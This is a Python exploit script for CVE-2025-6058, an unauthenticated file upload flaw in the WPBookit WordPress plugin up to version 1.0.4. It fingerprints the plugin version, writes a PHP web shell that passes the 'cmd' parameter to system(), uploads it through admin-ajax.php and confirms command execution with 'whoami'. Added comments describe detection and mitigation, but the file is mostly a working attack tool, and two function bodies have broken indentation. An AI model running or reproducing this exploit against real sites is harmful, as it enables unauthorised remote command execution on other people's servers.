import argparse
import requests
import re
import os
import sys
import time
from datetime import datetime
# Silences urllib3 warnings for the whole process. Combined with
# `session.verify = False` in main(), this hides the InsecureRequestWarning that
# urllib3 would otherwise emit for every HTTPS request sent without certificate
# validation, so nothing in the output shows that TLS is unverified.
requests.packages.urllib3.disable_warnings()
def print_banner():
    """Print the ASCII-art banner and then the author credit line to stdout."""
    art = r"""
______ __ __ ________ ______ ______ ______ _______ ______ ______ _______ ______
/ \ / | / |/ | / \ / \ / \ / | / \ / \ / | / \
/$$$$$$ |$$ | $$ |$$$$$$$$/ /$$$$$$ |/$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |/$$$$$$ |$$$$$$$/ /$$$$$$ |
$$ | $$/ $$ | $$ |$$ |__ ______$$____$$ |$$$ \$$ |$$____$$ |$$ |____ ______ $$ \__$$/ $$$ \$$ |$$ |____ $$ \__$$ |
$$ | $$ \ /$$/ $$ |/ |/ $$/ $$$$ $$ | / $$/ $$ \ / |$$ \ $$$$ $$ |$$ \ $$ $$<
$$ | __ $$ /$$/ $$$$$/ $$$$$$//$$$$$$/ $$ $$ $$ |/$$$$$$/ $$$$$$$ |$$$$$$/ $$$$$$$ |$$ $$ $$ |$$$$$$$ | $$$$$$ |
$$ \__/ | $$ $$/ $$ |_____ $$ |_____ $$ \$$$$ |$$ |_____ / \__$$ | $$ \__$$ |$$ \$$$$ |/ \__$$ |$$ \__$$ |
$$ $$/ $$$/ $$ | $$ |$$ $$$/ $$ |$$ $$/ $$ $$/ $$ $$$/ $$ $$/ $$ $$/
$$$$$$/ $/ $$$$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/ $$$$$$/
"""
    credit = "Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited\n"
    print(art)
    print(credit)
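def format_url(url):
    """Normalise a user-supplied site address into a base URL.

    Surrounding whitespace is removed, a scheme is added when none is present,
    and every trailing slash is dropped so callers can append ``/path`` without
    producing ``//``.

    Args:
        url: Address as typed on the command line, with or without a scheme.

    Returns:
        The address with an ``http://`` or ``https://`` prefix and no trailing
        slash.
    """
    url = url.strip()
    # URL schemes are case-insensitive; a case-sensitive test would prepend a
    # second scheme to input such as "HTTPS://host".
    if not url.lower().startswith(("http://", "https://")):
        # NOTE: a bare host name defaults to cleartext HTTP, not HTTPS.
        url = "http://" + url
    # rstrip removes all trailing slashes, not just the last one.
    return url.rstrip("/")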
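def version_to_tuple(version):
    """Convert a dotted numeric version string such as ``"1.0.4"`` to a tuple of ints.

    Raises:
        ValueError: If any dot-separated component is not a decimal integer
            (this includes empty components, e.g. a trailing dot).
    """
    return tuple(int(part) for part in version.split('.'))


def is_vulnerable_version(found_version, max_vulnerable="1.0.4"):
    """Report whether ``found_version`` is at or below ``max_vulnerable``.

    Both versions are padded with zeros to the same length before comparison,
    so ``"1.0.4.0"`` is treated as equal to ``"1.0.4"``. A plain tuple
    comparison would rank the longer tuple higher and misreport such a
    release as newer than the affected range.

    Args:
        found_version: Dotted numeric version read from the site.
        max_vulnerable: Highest affected version (inclusive).

    Returns:
        True when ``found_version`` <= ``max_vulnerable``. False when it is
        newer or when either value cannot be parsed, so an unparseable
        version is reported as "not vulnerable" rather than "unknown".
    """
    try:
        found = version_to_tuple(found_version)
        ceiling = version_to_tuple(max_vulnerable)
    except (ValueError, AttributeError, TypeError):
        # Non-numeric components or non-string input: keep the original
        # best-effort contract of answering False instead of raising.
        return False
    width = max(len(found), len(ceiling))
    found += (0,) * (width - len(found))
    ceiling += (0,) * (width - len(ceiling))
    return found <= ceiling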
def get_version(url, session, headers):
    """Return the plugin version a site advertises, if it is 1.0.4 or older.

    Requests ``<url>/wp-content/plugins/wpbookit/README.txt`` and reads the
    ``Stable tag:`` line from the response body.

    Args:
        url: Base URL of the site, without a trailing slash.
        session: Object exposing ``get(url, headers=..., timeout=...)``.
        headers: Request headers passed through to ``session.get``.

    Returns:
        The version string when it is at or below 1.0.4; None when the
        response is not HTTP 200, no ``Stable tag:`` line is found, or the
        version is newer.

    Note:
        The result reflects only what the readme file says. A missing or
        blocked readme yields None, which is not evidence that the installed
        plugin is outside the affected range.
    """
    print("[*] Checking plugin version ...")
    time.sleep(3)
    response = session.get(
        f"{url}/wp-content/plugins/wpbookit/README.txt",
        headers=headers,
        timeout=10,
    )
    if response.status_code != 200:
        return None
    tag = re.search(r"Stable tag:\s*([0-9.]+)", response.text)
    if tag is None:
        return None
    detected = tag.group(1).strip()
    return detected if is_vulnerable_version(detected, "1.0.4") else None
# Writes the upload payload to a file named "shell.php" in the current working
# directory and returns that file name.
def make_shell():
# Payload: a single-line PHP script that hands the `cmd` request parameter to
# system(). If a web server executes it, anyone who can request the file can run
# commands with the web-server account's privileges.
# Detection: the `system($_REQUEST[` construct is a plain, unobfuscated
# web-shell signature that content scanners and file-integrity monitoring on
# the uploads directory can match.
shell = '<?php if(isset($_REQUEST["cmd"])){system($_REQUEST["cmd"]);} ?>'
shell_name = "shell.php"
# Relative path: the file lands wherever the script was started from.
with open(shell_name, "w") as f:
f.write(shell)
return shell_name
# Uploads the file produced by make_shell() through the plugin's AJAX endpoint and
# then requests it back to see whether the server executes it.
# Returns the relative path (including the `?cmd=whoami` query) when the check
# passes, otherwise None.
#
# What the request looks like on the wire (useful for log review and WAF rules):
#   * POST <site>/wp-admin/admin-ajax.php, multipart/form-data
#   * form fields action=wpb_ajax_post and route_name=add_booking_type
#   * a file part named cover_image_img whose file name ends in .php
#   * a follow-up GET for a .php file under wp-content/uploads/<year>/<month>/
#     carrying a `cmd` query parameter
# This function adds no credentials or nonce to the request; the tool's own
# description labels the issue as an unauthenticated arbitrary file upload in
# WPBookit <= 1.0.4 (CVE-2025-6058).
# Mitigation: run a plugin release newer than 1.0.4 and configure the web server
# so that PHP files under wp-content/uploads are not executed.
def Nxploited(url, session, headers):
print("[*] Exploiting file upload ...")
time.sleep(2)
ajax_url = f"{url}/wp-admin/admin-ajax.php"
shell_file = make_shell()
with open(shell_file, 'rb') as f:
files = {
# Declared as application/octet-stream; the .php extension travels in the file name.
'cover_image_img': (shell_file, f, 'application/octet-stream')
}
data = {
'action': 'wpb_ajax_post',
'route_name': 'add_booking_type',
'title': 'Test',
'booking_type': 'Nxploited'
}
# The upload response is stored in `resp` but never inspected; success is judged
# only by the follow-up GET below.
resp = session.post(ajax_url, headers=headers, files=files, data=data, timeout=15)
# The path is built from the local clock and assumes the server files uploads
# under <year>/<month>/ with the original name kept. If the server's date or
# upload layout differs, the check fails even though a file may have been stored,
# so a "failed" result does not show that the site is unaffected.
now = datetime.now()
shell_path = f"wp-content/uploads/{now.year}/{now.strftime('%m')}/shell.php?cmd=whoami"
check_url = f"{url}/{shell_path}"
check = session.get(check_url, headers=headers, timeout=10)
# Only the local copy is deleted here; anything stored on the server remains
# there until it is removed on the server itself.
os.remove(shell_file)
# Passes on HTTP 200 with a non-empty body that does not contain the literal
# string "whoami". Any other non-empty 200 page (for example a custom error page
# served with status 200) would also pass, so this is a heuristic, not a proof.
if check.status_code == 200 and check.text.strip() and "whoami" not in check.text:
return shell_path
else:
return None
def main():
    """Command-line entry point.

    Parses ``-u/--url``, normalises it with ``format_url``, runs the version
    check, and exits with status 1 when ``get_version`` returns nothing.
    Otherwise calls ``Nxploited`` and prints either the returned path or a
    failure message.
    """
    print_banner()
    cli = argparse.ArgumentParser(
        description="CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)"
    )
    cli.add_argument("-u", "--url", required=True, help="Target URL e.g http(s)://target.com")
    options = cli.parse_args()

    http = requests.Session()
    # NOTE: certificate verification is switched off for every request on this
    # session, so HTTPS responses are accepted from any endpoint that answers,
    # and the results printed below carry no assurance about who produced them.
    http.verify = False
    request_headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    base_url = format_url(options.url)

    detected = get_version(base_url, http, request_headers)
    if not detected:
        print("[-] Target is not vulnerable or version could not be detected.")
        sys.exit(1)

    uploaded = Nxploited(base_url, http, request_headers)
    if not uploaded:
        print("[-] Exploitation failed or shell could not be confirmed.")
        return
    print("[+] Exploitation successful!")
    print(f"[+] Shell path: {uploaded}")
    print("Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited")


if __name__ == "__main__":
    main()